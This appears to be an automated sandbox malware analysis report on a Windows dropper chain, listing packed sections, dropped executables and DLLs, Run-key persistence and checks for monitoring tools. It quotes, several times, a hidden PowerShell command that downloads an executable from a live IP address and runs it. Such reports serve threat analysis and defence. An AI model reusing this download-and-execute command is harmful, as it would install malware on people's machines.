Source: random.exe	Static PE information: section name: ixwuewww entropy: 7.953592681888517
Source: 4CAJNBDWED5ZLJ2B.exe.0.dr	Static PE information: section name: exzbwtwb entropy: 7.953109010933317
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: section name: entropy: 7.127190838619128
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: section name: wskuzfvh entropy: 7.953114540532677
Source: skotes.exe.3.dr	Static PE information: section name: entropy: 7.127190838619128
Source: skotes.exe.3.dr	Static PE information: section name: wskuzfvh entropy: 7.953114540532677
Source: random[2].exe0.11.dr	Static PE information: section name: entropy: 7.93380966477028
Source: random[2].exe0.11.dr	Static PE information: section name: cwmuvuvv entropy: 7.952741747408867
Source: ede25bd9a2.exe.11.dr	Static PE information: section name: entropy: 7.93380966477028
Source: ede25bd9a2.exe.11.dr	Static PE information: section name: cwmuvuvv entropy: 7.952741747408867
Source: random[2].exe1.11.dr	Static PE information: section name: entropy: 7.978929742080368
Source: random[2].exe1.11.dr	Static PE information: section name: ifqcqdxm entropy: 7.954949777979871
Source: 298e6cea90.exe.11.dr	Static PE information: section name: entropy: 7.978929742080368
Source: 298e6cea90.exe.11.dr	Static PE information: section name: ifqcqdxm entropy: 7.954949777979871
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: section name: entropy: 7.980909183702386
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: section name: bhaywimc entropy: 7.954105147120386
Source: 7fOMOTQ.exe.11.dr	Static PE information: section name: entropy: 7.980909183702386
Source: 7fOMOTQ.exe.11.dr	Static PE information: section name: bhaywimc entropy: 7.954105147120386
Source: Fe36XBk[1].exe.11.dr	Static PE information: section name: entropy: 7.936555243798327
Source: Fe36XBk[1].exe.11.dr	Static PE information: section name: apuhhdvg entropy: 7.952252453116048
Source: Fe36XBk.exe.11.dr	Static PE information: section name: entropy: 7.936555243798327
Source: Fe36XBk.exe.11.dr	Static PE information: section name: apuhhdvg entropy: 7.952252453116048
Source: Bjkm5hE[1].exe.11.dr	Static PE information: section name: entropy: 7.98240674670441
Source: Bjkm5hE[1].exe.11.dr	Static PE information: section name: gfrqabhk entropy: 7.953368544557863
Source: Bjkm5hE.exe.11.dr	Static PE information: section name: entropy: 7.98240674670441
Source: Bjkm5hE.exe.11.dr	Static PE information: section name: gfrqabhk entropy: 7.953368544557863
Source: random[2].exe2.11.dr	Static PE information: section name: entropy: 7.974126000763948
Source: random[2].exe2.11.dr	Static PE information: section name: stywrpjp entropy: 7.954496346573678
Source: 13426522e9.exe.11.dr	Static PE information: section name: entropy: 7.974126000763948
Source: 13426522e9.exe.11.dr	Static PE information: section name: stywrpjp entropy: 7.954496346573678

Source: random[2].exe.11.dr, s1l70P8mWLYDmBOs6L.cs	High entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
Source: random[2].exe.11.dr, cVtkWMF9BXSUpNpZaGX.cs	High entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'
Source: 095fb861eb.exe.11.dr, s1l70P8mWLYDmBOs6L.cs	High entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
Source: 095fb861eb.exe.11.dr, cVtkWMF9BXSUpNpZaGX.cs	High entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'
Source: 1AWhJsY[1].exe.11.dr, eRtoUikQAUlfmrcXhP.cs	High entropy of concatenated method names: 'WKIpT6WRYP', 'GxIp0d0vl2', 'R3Ppdmg34A', 'iAsp1JjQqZ', 'yQwppAuByG', 'BT0pvkDekn', 'ENbpFei3CE', 'YlPUn7XuQH', 'Qsnpc1Onv9', 'jAdpZCXbre'
Source: 1AWhJsY[1].exe.11.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'KWWAW82sX', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
Source: 1AWhJsY.exe.11.dr, eRtoUikQAUlfmrcXhP.cs	High entropy of concatenated method names: 'WKIpT6WRYP', 'GxIp0d0vl2', 'R3Ppdmg34A', 'iAsp1JjQqZ', 'yQwppAuByG', 'BT0pvkDekn', 'ENbpFei3CE', 'YlPUn7XuQH', 'Qsnpc1Onv9', 'jAdpZCXbre'
Source: 1AWhJsY.exe.11.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'KWWAW82sX', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com

Jump to dropped file

Tries to download and execute files (via powershell)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071547001\Fe36XBk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\1AWhJsY[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\random.exe	File created: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071541001\07ab034c92.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071544001\cBeNU75.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Fe36XBk[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Bjkm5hE[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071550001\c9cc93b583.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071545001\1AWhJsY.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071549001\13426522e9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071551001\2ac0b54336.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071542001\ede25bd9a2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cBeNU75[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\random.exe	File created: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7fOMOTQ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071546001\7fOMOTQ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071552001\f803083b06.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071543001\298e6cea90.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1071548001\Bjkm5hE.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a59b997485.exe

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
